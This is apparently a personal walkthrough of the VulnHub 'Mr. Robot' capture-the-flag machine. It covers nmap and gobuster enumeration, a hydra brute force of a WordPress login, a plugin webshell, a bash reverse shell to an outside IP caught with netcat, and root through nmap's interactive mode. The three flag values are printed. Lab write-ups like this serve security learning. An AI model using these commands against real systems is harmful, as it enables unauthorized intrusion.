Mr. Robot - vulnhub
Flag 1
As always I start with nmap and gobuster.
1
2
3
nmap -sC -sV -oN nmap/initial $IP
gobuster dir -u http://$IP -w wordlist.txt -x .cgi,.txt,.php,.html,.py,.sh,.jpg,.png -t 200
by enumerating the website and going to
1
http://<box ip>/robot.
it shows that their is a file called ‘key-1-of-3.txt’. if you browse to it you will be given the first flag
073403c8a58a1f80d943455fb30724b9
Flag 2
This one was complicated for me. So after finding the first flag in /robots their was also a file called fsocity.dic. I pulled that file with curl and then sorted it out with sort and filtered it down using uniq to bring down the amount of repeats in the dictionary.
1
curl -o fsocity.dic http://$IP/fsocity.dic
1
sort fsocity.dic | uniq
You can also just do
1
sort -u fsocity.dic
I then went to the /wp-login found when enumerating and used hydra to enumerate the logon process with the username being elliot.
1
hydra -l elliot -P wordlist.txt $IP
I found the username by guesswork but could be found with hydra as well using the fsocity.dic that we sorted out.
After finding the password for the account elliot, we see that it is an admin account. Ngl I was stumped for a minute trying to find out how to exploit wordpress. I went down multiple rabbit holes like : exploiting xmlrpc.php, or trying LFI’s and other related CVE’s. I then conceited and peeked at a writeup and saw a few different ways people progressed. Trying to get a hold of a shell was a pain. Some of the methods just did not work. I tried adding a php reverse shell via templates. both making my own and editing the 404 template didn’t work. then I ultimately found out I can use a plugin to access a webshell (which I now learned is very tedious to use. might make a tool to interface with it:) After gaining access through the plugin and navigating to it. I learned I can move throughout directories and that i can execute commands. I used a bash reverse shell and caught it with netcat.
1
2
bash -i >& /dev/tcp/10.10.10.10/8080 0>&1
nc -lnvvp 8080
I then searched for different files and saw the flag. however I could not read it. I would need to be a different user to access it. In the same directory as the flag was a password that was an md5 hash of the password of a user robot. I cracked the hash using john the ripper and tried to log in as the robot user, however I needed to be in an actual terminal so I stabilized the shell with python
1
2
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
and logged in as robot. then I read the flag file.
822c73956184f694993bede3eb39f959
Flag 3
Now that we have access to the system lets try and escalate to root.
To do so lets enumerate the system. Now i did this by hand butIi also could have imported linpeas or linenum to do this for me. I tried:
1
2
3
sudo -l
ps aux
find / -perm 4000 -exec root
nothing, I then started researching and noticed others add a “w” to the ps aux I did before. So I tried it and saw a few processes running and noticed nmap. I then went to gtfobins and tried –interactive and !su. IM ROOT!!! Now I navigated to /root and saw the 3rd flag. cat it out and bam.
04787ddef27c3dee1ee161b21670b4e4
and so concludes the mr robot ctf from vulnhub! I had done this before I knew it was also ported to TryHackMe and it was the same for their too